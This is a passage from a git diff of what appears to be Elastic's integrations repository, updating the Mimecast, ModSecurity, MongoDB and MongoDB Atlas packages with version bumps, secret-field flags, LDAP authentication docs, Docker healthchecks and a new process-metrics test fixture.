filename=\\\"jrnl_20211018093329655.json\\\"\",\"Dir\":\"Internal\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"RcptHdrType\":\"Unknown\",\"Sender\":\"johndoe@example.com\",\"aCode\":\"fjihpfEgM_iRwemxhe3t_w\",\"acc\":\"ABC123\",\"datetime\":\"2021-11-12T12:15:46+0000\"}", "outcome": "unknown" }, @@ -500,7 +497,6 @@ An example event for `siem` looks as following: "mimecast-siem-logs" ] } - ``` **Exported fields** @@ -583,12 +579,13 @@ An example event for `siem` looks as following: | mimecast.IPThreadDict | For emails subject to Targeted Threat Protection - Impersonation Protect, if the content of the email was detected to contain words in the Mimecast threat dictionary. | keyword | | mimecast.InternalName | The email was detected to be from an internal user name. | keyword | | mimecast.Latency | The time in milliseconds that the delivery attempt took. | long | -| mimecast.MimecastIP | The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal. | keyword | +| mimecast.MimecastIP | The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal. | keyword | | mimecast.MsgId | The internet message id of the email. | keyword | | mimecast.MsgSize | The total size of the email. | long | | mimecast.RcptActType | Action after reception. | keyword | | mimecast.RcptHdrType | Type of the receipt header. | keyword | | mimecast.ReceiptAck | The receipt acknowledgment message received by Mimecast from the receiving mail server. | keyword | +| mimecast.Recipient | The recipient of the original message. | keyword | | mimecast.ReplyMismatch | The reply address does not correspond to the senders address. | keyword | | mimecast.Route | Email route. | keyword | | mimecast.ScanResultInfo | The reason that the click was blocked. | keyword | @@ -715,7 +712,6 @@ An example event for `threat_intel_malware_customer` looks as following: } } } - ``` **Exported fields** @@ -872,7 +868,6 @@ An example event for `threat_intel_malware_grid` looks as following: } } } - ``` **Exported fields** @@ -1037,7 +1032,6 @@ An example event for `ttp_ap` looks as following: "mimecast-ttp-ap" ] } - ``` **Exported fields** @@ -1204,7 +1198,6 @@ An example event for `ttp_ip` looks as following: "mimecast-ttp-ip" ] } - ``` **Exported fields** @@ -1386,7 +1379,6 @@ An example event for `ttp_url` looks as following: ] } } - ``` **Exported fields** diff --git a/packages/mimecast/manifest.yml b/packages/mimecast/manifest.yml index 0693d3bafc3..0b02efc7ae5 100644 --- a/packages/mimecast/manifest.yml +++ b/packages/mimecast/manifest.yml @@ -1,14 +1,14 @@ # -format_version: "3.0.0" +format_version: "3.0.2" name: mimecast title: "Mimecast" -version: "1.22.1" +version: "1.24.0" description: Collect logs from Mimecast with Elastic Agent. type: integration categories: ["security", "email_security"] conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" screenshots: - src: /img/mimecast.png title: Sample screenshot @@ -43,6 +43,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: app_id type: password title: Application ID @@ -50,6 +51,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: access_key type: password title: Access Key @@ -57,6 +59,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: secret_key type: password title: Secret Key @@ -64,6 +67,7 @@ policy_templates: multi: false required: true show_user: true + secret: true owner: github: elastic/security-service-integrations type: partner diff --git a/packages/modsecurity/changelog.yml b/packages/modsecurity/changelog.yml index 7a6d6d1a156..fc1c67fb45f 100644 --- a/packages/modsecurity/changelog.yml +++ b/packages/modsecurity/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.17.2" changes: - description: Changed owners diff --git a/packages/modsecurity/manifest.yml b/packages/modsecurity/manifest.yml index 885f760a10d..19380866fc9 100644 --- a/packages/modsecurity/manifest.yml +++ b/packages/modsecurity/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: modsecurity title: "ModSecurity Audit" -version: "1.17.2" +version: "1.18.0" description: Collect logs from ModSecurity with Elastic Agent type: integration categories: diff --git a/packages/mongodb/_dev/build/docs/README.md b/packages/mongodb/_dev/build/docs/README.md index 5055fbf4f72..d82e8a6351c 100644 --- a/packages/mongodb/_dev/build/docs/README.md +++ b/packages/mongodb/_dev/build/docs/README.md @@ -2,6 +2,35 @@ This integration is used to fetch logs and metrics from [MongoDB](https://www.mongodb.com/). +## Configuration Notes + +When configuring the `hosts` option, MongoDB URIs must adhere to the following formats: + +- Simple: `mongodb://[user:pass@]host[:port][?options]` +- Complex: `mongodb://[username:password@]host1[:port1][,...hostN[:portN]][/[defaultauthdb][?options]]` + +Examples of URIs can vary from simple to complex: + +- Simple: `localhost` +- Complex: `mongodb://myuser:mypass@localhost:40001", "otherhost:40001` + +Additional supported URI examples include: + +- Replica set: `mongodb://localhost:27017,localhost:27022,localhost:27023/?replicaSet=dbrs` +- Direct connection: `mongodb://localhost:27017/?directConnection=true` + +When using the `directConnection=true` parameter in the connection URI, all operations are executed on the specified host. It's important to explicitly include `directConnection=true` in the URI as it won't be automatically added. + +- Authentication: `mongodb://username:password@host:port/authSource=$external?authMechanism=PLAIN` + +When specifying `authMechanism` as PLAIN, it indicates the use of the PLAIN authentication mechanism, which is commonly associated with LDAP. + +`authSource` can be used to specify the name of the database that has the collection with the user credentials. + +In MongoDB, `authSource=$external` is a special authentication database used for authenticating users externally, such as via LDAP. + +The username and password can either be included in the URI or set using the respective configuration options. If included in the URI, these credentials take precedence over any configured username and password configuration options. + ## Compatibility The `log` dataset is tested with logs from versions v3.2.11 and v4.4.4 in @@ -28,6 +57,10 @@ db.createUser( } ) ``` +You can use the following command in Mongo shell to authenticate a user against a specific database with the provided username and password (make sure you are using the `admin` db by using `db` command in Mongo shell). +``` +db.auth(user, pass) +``` You can use the following command in Mongo shell to grant the role to an existing user (make sure you are using the `admin` db by using `db` command in diff --git a/packages/mongodb/_dev/deploy/docker/Dockerfile b/packages/mongodb/_dev/deploy/docker/Dockerfile index 05344d72c15..2ee8eef9a5b 100644 --- a/packages/mongodb/_dev/deploy/docker/Dockerfile +++ b/packages/mongodb/_dev/deploy/docker/Dockerfile @@ -1,4 +1,5 @@ -ARG SERVICE_VERSION=${SERVICE_VERSION:-3.4} +ARG SERVICE_VERSION=${SERVICE_VERSION:-5.0} FROM mongo:${SERVICE_VERSION} RUN sed -i "/jessie-updates/d" /etc/apt/sources.list -RUN apt-get update && apt-get install -y netcat \ No newline at end of file +RUN apt-get update && apt-get install -y netcat +HEALTHCHECK --interval=1s --retries=90 CMD nc -z localhost 27017 \ No newline at end of file diff --git a/packages/mongodb/_dev/deploy/docker/creator/Dockerfile b/packages/mongodb/_dev/deploy/docker/creator/Dockerfile index 37672601dcd..d765c619e3a 100644 --- a/packages/mongodb/_dev/deploy/docker/creator/Dockerfile +++ b/packages/mongodb/_dev/deploy/docker/creator/Dockerfile @@ -1,6 +1,5 @@ -ARG SERVICE_VERSION=${SERVICE_VERSION:-3.4} +ARG SERVICE_VERSION=${SERVICE_VERSION:-5.0} FROM mongo:${SERVICE_VERSION} RUN sed -i "/jessie-updates/d" /etc/apt/sources.list RUN apt-get update && apt-get install -y netcat -HEALTHCHECK --interval=1s --retries=90 \ - CMD echo 'db.runCommand({serverStatus:1}).ok' | mongo \ No newline at end of file +HEALTHCHECK --interval=1s --retries=90 CMD nc -z localhost 27017 diff --git a/packages/mongodb/_dev/deploy/docker/docker-compose.yml b/packages/mongodb/_dev/deploy/docker/docker-compose.yml index 6133662f69c..e562fa75540 100644 --- a/packages/mongodb/_dev/deploy/docker/docker-compose.yml +++ b/packages/mongodb/_dev/deploy/docker/docker-compose.yml @@ -1,14 +1,15 @@ version: '2.3' services: mongodb: - build: creator + image: docker.elastic.co/integrations-ci/beats-mongodb:${MONGODB_VERSION:-5.0}-1 + build: + context: ./creator + args: + MONGODB_VERSION: ${MONGODB_VERSION:-5.0} ports: - - 27017 - command: - - '--replSet' - - 'beats' + - 27017:27017 mongodb-log: - image: docker.elastic.co/integrations-ci/beats-mongodb:${MONGODB_VERSION:-3.4}-1 + image: docker.elastic.co/integrations-ci/beats-mongodb:${MONGODB_VERSION:-5.0}-1 user: root build: context: . @@ -16,4 +17,3 @@ services: - ${SERVICE_LOGS_DIR}:/var/log/mongodb entrypoint: > bash -c "chmod a+wx /var/log/mongodb && chmod a+r -R /var/log/mongodb && touch /var/log/mongodb/mongod.log && chmod 644 /var/log/mongodb/mongod.log && mongod --replSet beats --logpath /var/log/mongodb/mongod.log --logappend" - diff --git a/packages/mongodb/changelog.yml b/packages/mongodb/changelog.yml index 38d5a18b36d..cf136ab1599 100644 --- a/packages/mongodb/changelog.yml +++ b/packages/mongodb/changelog.yml @@ -1,3 +1,23 @@ +- version: 1.13.3 + changes: + - description: Update README with support of LDAP authentication. + type: enhancement + link: https://github.com/elastic/integrations/pull/9526 +- version: 1.13.2 + changes: + - description: Update the Kibana version to fix the disk space exhaustion. + type: bugfix + link: https://github.com/elastic/integrations/pull/9221 +- version: 1.13.1 + changes: + - description: Update the Kibana version condition for multihost fix support and add MongoDB `hosts` field examples to the documentation. + type: bugfix + link: https://github.com/elastic/integrations/pull/9189 +- version: 1.13.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.12.3 changes: - description: Update metrics datastreams compatibility version in docs. diff --git a/packages/mongodb/docs/README.md b/packages/mongodb/docs/README.md index c7cf73d6ed0..a77e688e17d 100644 --- a/packages/mongodb/docs/README.md +++ b/packages/mongodb/docs/README.md @@ -2,6 +2,35 @@ This integration is used to fetch logs and metrics from [MongoDB](https://www.mongodb.com/). +## Configuration Notes + +When configuring the `hosts` option, MongoDB URIs must adhere to the following formats: + +- Simple: `mongodb://[user:pass@]host[:port][?options]` +- Complex: `mongodb://[username:password@]host1[:port1][,...hostN[:portN]][/[defaultauthdb][?options]]` + +Examples of URIs can vary from simple to complex: + +- Simple: `localhost` +- Complex: `mongodb://myuser:mypass@localhost:40001", "otherhost:40001` + +Additional supported URI examples include: + +- Replica set: `mongodb://localhost:27017,localhost:27022,localhost:27023/?replicaSet=dbrs` +- Direct connection: `mongodb://localhost:27017/?directConnection=true` + +When using the `directConnection=true` parameter in the connection URI, all operations are executed on the specified host. It's important to explicitly include `directConnection=true` in the URI as it won't be automatically added. + +- Authentication: `mongodb://username:password@host:port/authSource=$external?authMechanism=PLAIN` + +When specifying `authMechanism` as PLAIN, it indicates the use of the PLAIN authentication mechanism, which is commonly associated with LDAP. + +`authSource` can be used to specify the name of the database that has the collection with the user credentials. + +In MongoDB, `authSource=$external` is a special authentication database used for authenticating users externally, such as via LDAP. + +The username and password can either be included in the URI or set using the respective configuration options. If included in the URI, these credentials take precedence over any configured username and password configuration options. + ## Compatibility The `log` dataset is tested with logs from versions v3.2.11 and v4.4.4 in @@ -28,6 +57,10 @@ db.createUser( } ) ``` +You can use the following command in Mongo shell to authenticate a user against a specific database with the provided username and password (make sure you are using the `admin` db by using `db` command in Mongo shell). +``` +db.auth(user, pass) +``` You can use the following command in Mongo shell to grant the role to an existing user (make sure you are using the `admin` db by using `db` command in diff --git a/packages/mongodb/manifest.yml b/packages/mongodb/manifest.yml index ef227d1e5fe..eb00ab42757 100644 --- a/packages/mongodb/manifest.yml +++ b/packages/mongodb/manifest.yml @@ -1,6 +1,6 @@ name: mongodb title: MongoDB -version: "1.12.3" +version: "1.13.3" description: Collect logs and metrics from MongoDB instances with Elastic Agent. type: integration categories: @@ -11,10 +11,10 @@ icons: title: logo mongodb size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" conditions: kibana: - version: "^8.8.0" + version: "^8.12.2" elastic: subscription: basic screenshots: @@ -89,6 +89,7 @@ policy_templates: multi: false required: false show_user: false + secret: true title: Collect MongoDB metrics description: Collecting metrics from MongoDB instances owner: diff --git a/packages/mongodb_atlas/_dev/build/docs/README.md b/packages/mongodb_atlas/_dev/build/docs/README.md index d6a6c74623c..1d89ec5e88c 100644 --- a/packages/mongodb_atlas/_dev/build/docs/README.md +++ b/packages/mongodb_atlas/_dev/build/docs/README.md @@ -6,19 +6,23 @@ Use the MongoDB Atlas integration to: -- Collect MongoDB Audit logs for comprehensive monitoring and analysis. +- Collect MongoDB Audit logs and Process metrics for comprehensive monitoring and analysis. - Create informative visualizations to track usage trends, measure key metrics, and derive actionable business insights. - Set up alerts to minimize Mean Time to Detect (MTTD) and Mean Time to Resolve (MTTR) by quickly referencing relevant logs during troubleshooting. ## Data streams -The MongoDB Atlas integration collects logs. +The MongoDB Atlas integration collects logs and metrics. Logs help you keep a record of events that happen on your machine. The `Log` data stream collected by MongoDB Atlas integration is `mongod_audit`. +Metrics give you insight into the statistics of the MongoDB Atlas. The `Metric` data stream collected by the MongoDB Atlas integration is `process` so that the user can monitor and troubleshoot the performance of the MongoDB Atlas instance. + Data streams: - `mongod_audit`: The auditing facility allows administrators and users to track system activity for deployments with multiple users and applications. Mongod Audit logs capture events related to database operations such as insertions, updates, deletions, user authentication, etc., occurring within the mongod instances. +- `process` : This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + Note: - Users can monitor and see the log inside the ingested documents for MongoDB Atlas in the `logs-*` index pattern from `Discover`. @@ -28,18 +32,25 @@ You can store and search your data using Elasticsearch and visualize and manage ## Setup -### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required: +### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required 1. Public Key 2. Private Key 3. GroupId -### Steps to obtain Public Key, Private Key and GroupId: +### Steps to obtain Public Key, Private Key and GroupId 1. Generate programmatic API Keys with project owner permissions using the instructions in the Atlas [documentation](https://www.mongodb.com/docs/atlas/configure-api-access/#create-an-api-key-for-a-project). Then, copy the public key and private key. These serve the same function as a username and API Key respectively. 2. Enable Database Auditing for the Atlas project you want to monitor logs. You can follow the instructions provided in this Atlas [document](https://www.mongodb.com/docs/atlas/database-auditing/#procedure). 3. You can find your Project ID (Group ID) in the Atlas UI. To do this, navigate to your project, click on Settings, and copy the Project ID (Group ID). You can also programmatically find it using the Atlas Admin API or Atlas CLI as described in this Atlas [document](https://www.mongodb.com/docs/atlas/app-services/apps/metadata/#find-a-project-id). +### Important terms of MongoDB Atlas API + +1. Granularity: Duration that specifies the interval at which Atlas reports the metrics. +2. Period: Duration over which Atlas reports the metrics. + +Note: Both of above attributes can be set by using `period` in configuration parameters. + ### Steps to enable Integration in Elastic 1. In Kibana go to Management > Integrations @@ -72,4 +83,13 @@ This is the `mongod_audit` data stream. This data stream allows administrators a {{event "mongod_audit"}} -{{fields "mongod_audit"}} \ No newline at end of file +{{fields "mongod_audit"}} + +## Metrics reference + +### Process +This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + +{{event "process"}} + +{{fields "process"}} diff --git a/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test b/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test index e47ddb26a99..10c9c4b31e8 100755 Binary files a/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test and b/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test differ diff --git a/packages/mongodb_atlas/changelog.yml b/packages/mongodb_atlas/changelog.yml index d06b0c9748d..10de1cb5417 100644 --- a/packages/mongodb_atlas/changelog.yml +++ b/packages/mongodb_atlas/changelog.yml @@ -1,6 +1,11 @@ # newer versions go on top -- version: "0.0.1" +- version: "0.0.2" changes: - description: MongoDB Atlas integration package with "mongod_audit" data stream. type: enhancement link: https://github.com/elastic/integrations/pull/9020 +- version: "0.0.1" + changes: + - description: MongoDB Atlas integration package with "process" data stream. + type: enhancement + link: https://github.com/elastic/integrations/pull/9552 diff --git a/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs b/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs index 938741c6ba8..b45dff66716 100644 --- a/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs +++ b/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs @@ -50,7 +50,7 @@ program: | "endDate": int(now) })).as(state, state.with(request("GET", state.url + "/api/atlas/v2/groups/" + state.groupId + "/processes?pageNum=" + string(state.page_num) + "&itemsPerPage=100").with({ "Header": { - "Accept": ["application/vnd.atlas." + string(timestamp(now).getFullYear()) + "-01-01+json"] + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+gzip"] } }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { @@ -65,7 +65,7 @@ program: | request("GET", state.url + "/api/atlas/v2/groups/" + state.groupId + "/clusters/" + state.hostlist[state.next] + "/logs/mongodb-audit-log.gz?startDate=" + string(int(state.startDate)) + "&endDate=" + string(int(state.endDate)) ).with({ "Header": { - "Accept": ["application/vnd.atlas." + string(timestamp(now).getFullYear()) + "-01-01+gzip"] + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+gzip"] } }).do_request().as(resp, ( resp.StatusCode == 200 && resp.ContentLength != 0 @@ -104,4 +104,4 @@ program: | : {} ) - ) \ No newline at end of file + ) diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-common-config.yml b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json new file mode 100644 index 00000000000..73561ff522e --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json @@ -0,0 +1,144 @@ +{ + "events": [ + { + "groupId": "646f4379c47da356740d14ad", + "hostId": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017", + "response": { + "ASSERT_MSG": 0.213805548, + "ASSERT_REGULAR": 0.33244343545, + "ASSERT_USER": 0.34219922212309, + "ASSERT_WARNING": 0.33245678912, + "BACKGROUND_FLUSH_AVG": 0.224438123, + "CACHE_DIRTY_BYTES": 12567.12, + "CACHE_BYTES_READ_INTO": 132153.9, + "CACHE_USED_BYTES": 821456778.500023, + "CACHE_BYTES_WRITTEN_FROM": 1328.7865221233, + "CONNECTIONS": 38, + "MAX_PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL": 0.33455633344, + "MAX_PROCESS_CPU_CHILDREN_KERNEL": 0.182233244, + "PROCESS_CPU_CHILDREN_KERNEL": 0.223444567789, + "MAX_PROCESS_CPU_CHILDREN_USER": 0.2789877666, + "PROCESS_CPU_CHILDREN_USER": 0.127876554, + "MAX_PROCESS_CPU_KERNEL": 0.198877766, + "PROCESS_CPU_KERNEL": 0.23777324612388449, + "PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL": 0.21343458834492, + "MAX_PROCESS_NORMALIZED_CPU_CHILDREN_USER": 0.2426637278, + "PROCESS_NORMALIZED_CPU_CHILDREN_USER": 0.434455522443, + "MAX_PROCESS_NORMALIZED_CPU_KERNEL": 0.98763331334444322, + "PROCESS_NORMALIZED_CPU_KERNEL": 0.07326222334291, + "MAX_PROCESS_NORMALIZED_CPU_USER": 3.9237183371832, + "PROCESS_NORMALIZED_CPU_USER": 0.6547433822844, + "MAX_PROCESS_CPU_USER": 8.934677738289, + "PROCESS_CPU_USER": 1.0725321162733222133, + "CURSORS_TOTAL_OPEN": 3, + "CURSORS_TOTAL_TIMED_OUT": 2.987333711237, + "DB_DATA_SIZE_TOTAL": 12352234432, + "DB_STORAGE_TOTAL": 41235435, + "DOCUMENT_METRICS_DELETED": 0.35222371123144, + "DOCUMENT_METRICS_INSERTED": 0.298877313444, + "DOCUMENT_METRICS_RETURNED": 0.2333067316131, + "DOCUMENT_METRICS_UPDATED": 0.039932412345432, + "FTS_PROCESS_CPU_KERNEL": 0.22325346765433, + "FTS_PROCESS_NORMALIZED_CPU_KERNEL": 0.2137811999382, + "FTS_PROCESS_NORMALIZED_CPU_USER": 0.321445664321, + "FTS_PROCESS_CPU_USER": 0.24566543211, + "FTS_DISK_UTILIZATION": 0.1228391993818, + "FTS_MEMORY_MAPPED": 0.328123372383, + "FTS_MEMORY_RESIDENT": 0.12444445223, + "FTS_MEMORY_VIRTUAL": 0.1433342324553, + "GLOBAL_ACCESSES_NOT_IN_MEMORY": 3227372, + "GLOBAL_LOCK_CURRENT_QUEUE_READERS": 263737882, + "GLOBAL_LOCK_CURRENT_QUEUE_TOTAL": 4127712, + "GLOBAL_LOCK_CURRENT_QUEUE_WRITERS": 2153363, + "GLOBAL_PAGE_FAULT_EXCEPTIONS_THROWN": 3, + "EXTRA_INFO_PAGE_FAULTS": 1241, + "INDEX_COUNTERS_BTREE_ACCESSES": 14221, + "INDEX_COUNTERS_BTREE_HITS": 267712392, + "INDEX_COUNTERS_BTREE_MISS_RATIO": 1.623372, + "INDEX_COUNTERS_BTREE_MISSES": 132543, + "JOURNALING_COMMITS_IN_WRITE_LOCK": 11322, + "JOURNALING_MB": 1.2836627, + "JOURNALING_WRITE_DATA_FILES_MB": 23.23442, + "MAX_SYSTEM_NORMALIZED_CPU_USER": 23.87636632771, + "COMPUTED_MEMORY": 34.238, + "MEMORY_MAPPED": 21.32477234, + "MEMORY_RESIDENT": 190.4, + "MEMORY_VIRTUAL": 3242.1122, + "NETWORK_BYTES_IN": 313.872898381, + "NETWORK_BYTES_OUT": 20923.523387712, + "NETWORK_NUM_REQUESTS": 13.287773311191, + "OPCOUNTER_CMD": 13.472788221236, + "OPCOUNTER_DELETE": 0.8374367234442, + "OPCOUNTER_GETMORE": 1.34425467654, + "OPCOUNTER_INSERT": 0.24442323654, + "OPCOUNTER_QUERY": 0.1456555474455228, + "OPCOUNTER_REPL_CMD": 0.244556655421, + "OPCOUNTER_REPL_DELETE": 0.00456765432333333, + "OPCOUNTER_REPL_INSERT": 0.003333222133, + "OPCOUNTER_REPL_UPDATE": 0.05837348438, + "OPCOUNTER_UPDATE": 0.047555753224433, + "OP_EXECUTION_TIME_COMMANDS": 0.07347823122113, + "OP_EXECUTION_TIME_READS": 0.16234554981, + "OP_EXECUTION_TIME_WRITES": 0.24552345, + "OPERATIONS_SCAN_AND_ORDER": 0.36373718112, + "OPLOG_MASTER_LAG_TIME_DIFF": 2786665.435567, + "OPLOG_MASTER_TIME": 2771288.8755, + "OPLOG_RATE_GB_PER_HOUR": 0.0001341, + "OPLOG_REPLICATION_LAG": 0.00134322, + "OPLOG_SLAVE_LAG_MASTER_TIME": 21.23442, + "QUERY_EXECUTOR_SCANNED": 0.0033322145545511, + "QUERY_EXECUTOR_SCANNED_OBJECTS": 0.2663211245776, + "QUERY_TARGETING_SCANNED_OBJECTS_PER_RETURNED": 1.16235487878865, + "QUERY_TARGETING_SCANNED_PER_RETURNED": 0.007346657774388, + "RESTARTS_IN_LAST_HOUR": 6, + "MAX_SWAP_USAGE_FREE": 4193787.0000000004, + "SWAP_USAGE_FREE": 4193787.89324442122, + "SWAP_USAGE_USED": 511.8778888886, + "MAX_SWAP_USAGE_USED": 511.9999888888, + "MAX_SYSTEM_CPU_GUEST": 231.8657881111, + "SYSTEM_CPU_GUEST": 265.7363623321122, + "MAX_SYSTEM_CPU_IOWAIT": 111.335453221, + "SYSTEM_CPU_IOWAIT": 1.33334554555446, + "MAX_SYSTEM_CPU_IRQ": 1.243556311245, + "SYSTEM_CPU_IRQ": 2.233235555, + "MAX_SYSTEM_CPU_KERNEL": 13.3839493839467, + "SYSTEM_CPU_KERNEL": 1.413822809117, + "SYSTEM_CPU_NICE": 3.12455667777, + "MAX_SYSTEM_CPU_SOFTIRQ": 1.3880999000999, + "SYSTEM_CPU_SOFTIRQ": 0.09578823373226, + "MAX_SYSTEM_CPU_STEAL": 13.9995777339999, + "SYSTEM_CPU_STEAL": 0.7125933648776, + "MAX_SYSTEM_CPU_USER": 0.233311345555, + "SYSTEM_CPU_USER": 19.94005994777666, + "SYSTEM_MEMORY_AVAILABLE": 1297178.4, + "MAX_SYSTEM_MEMORY_AVAILABLE": 1287180, + "SYSTEM_MEMORY_FREE": 140886, + "MAX_SYSTEM_MEMORY_FREE": 149138.8, + "SYSTEM_MEMORY_USED": 567885.3, + "MAX_SYSTEM_MEMORY_USED": 1852490, + "SYSTEM_NETWORK_IN": 1345.89298711, + "MAX_SYSTEM_NETWORK_IN": 176129.9111111111002, + "MAX_SYSTEM_NETWORK_OUT": 11789.7, + "SYSTEM_NETWORK_OUT": 737.89400083167, + "MAX_SYSTEM_NORMALIZED_CPU_GUEST": 123.4435467577443, + "SYSTEM_NORMALIZED_CPU_GUEST": 122.332344335578, + "MAX_SYSTEM_NORMALIZED_CPU_IOWAIT": 0.7, + "SYSTEM_NORMALIZED_CPU_IOWAIT": 0.076625581546717, + "MAX_SYSTEM_NORMALIZED_CPU_IRQ": 0.086543389996543, + "SYSTEM_NORMALIZED_CPU_IRQ": 0.187666323010, + "MAX_SYSTEM_NORMALIZED_CPU_KERNEL": 8.78943256778111, + "SYSTEM_NORMALIZED_CPU_KERNEL": 0.9222388999125745, + "MAX_SYSTEM_NORMALIZED_CPU_NICE": 0.89631899, + "SYSTEM_NORMALIZED_CPU_NICE": 0.23488931133323, + "MAX_SYSTEM_NORMALIZED_CPU_SOFTIRQ": 0.59970029934565434, + "SYSTEM_NORMALIZED_CPU_SOFTIRQ": 0.06667564629406, + "MAX_SYSTEM_NORMALIZED_CPU_STEAL": 3.0995004995004996, + "SYSTEM_NORMALIZED_CPU_STEAL": 0.4948211119340082, + "SYSTEM_NORMALIZED_CPU_USER": 2.09939880605, + "TICKETS_AVAILABLE_READS": 127, + "TICKETS_AVAILABLE_WRITE": 126 + }, + "processId": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017" + } + ] +} diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json-expected.json b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json-expected.json new file mode 100644 index 00000000000..176565d006f --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json-expected.json @@ -0,0 +1,479 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "process" + ], + "kind": "event", + "module": "mongodb_atlas", + "type": [ + "info" + ] + }, + "mongodb_atlas": { + "group_id": "646f4379c47da356740d14ad", + "host_id": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017", + "process": { + "assert": { + "msg": 0.213805548, + "regular": 0.33244343545, + "user": 0.34219922212309, + "warning": 0.33245678912 + }, + "background_flush": { + "avg": 0.224438123 + }, + "cache": { + "dirty": { + "bytes": 12567.12 + }, + "read": { + "bytes": 132153.9 + }, + "used": { + "total": { + "bytes": 8.21456778500023E8 + } + }, + "write": { + "bytes": 1328.7865221233 + } + }, + "connections": 38, + "cpu": { + "children": { + "kernel": { + "max": { + "pct": 0.182233244 + }, + "pct": 0.223444567789 + }, + "user": { + "max": { + "pct": 0.2789877666 + }, + "pct": 0.127876554 + } + }, + "kernel": { + "max": { + "pct": 0.198877766 + }, + "pct": 0.23777324612388448 + }, + "normalized": { + "children": { + "kernel": { + "max": { + "pct": 0.33455633344 + }, + "pct": 0.21343458834492 + }, + "user": { + "max": { + "pct": 0.2426637278 + }, + "pct": 0.434455522443 + } + }, + "kernel": { + "max": { + "pct": 0.9876333133444433 + }, + "pct": 0.07326222334291 + }, + "user": { + "max": { + "pct": 3.9237183371832 + }, + "pct": 0.6547433822844 + } + }, + "user": { + "max": { + "pct": 8.934677738289 + }, + "pct": 1.0725321162733221 + } + }, + "cursor": { + "open": { + "total": 3 + }, + "timed_out": { + "total": 2.987333711237 + } + }, + "database": { + "size": { + "total": { + "bytes": 12352234432 + } + }, + "storage": { + "total": { + "bytes": 41235435 + } + } + }, + "document": { + "deleted": 0.35222371123144, + "inserted": 0.298877313444, + "returned": 0.2333067316131, + "updated": 0.039932412345432 + }, + "fts": { + "cpu": { + "kernel": { + "pct": 0.22325346765433 + }, + "normalized": { + "kernel": { + "pct": 0.2137811999382 + }, + "user": { + "pct": 0.321445664321 + } + }, + "user": { + "pct": 0.24566543211 + } + }, + "disk": { + "utilization": { + "total": { + "bytes": 0.1228391993818 + } + } + }, + "memory": { + "mapped": { + "total": { + "bytes": 0.328123372383 + } + }, + "resident": { + "total": { + "bytes": 0.12444445223 + } + }, + "virtual": { + "total": { + "bytes": 0.1433342324553 + } + } + } + }, + "global": { + "access": { + "not_in_memory": 3227372 + }, + "lock": { + "current_queue": { + "reader": { + "count": 263737882 + }, + "total": 4127712, + "writer": { + "count": 2153363 + } + } + }, + "page_fault": { + "exception_thrown": 3 + } + }, + "host": { + "page_faults": 1241 + }, + "index": { + "btree": { + "access": { + "count": 14221 + }, + "hits": { + "count": 267712392 + }, + "miss": { + "count": 132543 + }, + "miss_ratio": { + "count": 1.623372 + } + } + }, + "journaling": { + "commits": { + "write_lock": 11322 + }, + "mb": 1.2836627, + "write": { + "data_files": { + "mb": 23.23442 + } + } + }, + "memory": { + "computed": { + "mb": 34.238 + }, + "mapped": { + "mb": 21.32477234 + }, + "resident": { + "mb": 190.4 + }, + "virtual": { + "mb": 3242.1122 + } + }, + "network": { + "in": 313.872898381, + "out": 20923.523387712, + "request": { + "total": 13.287773311191 + } + }, + "opcounter": { + "cmd": 13.472788221236, + "delete": 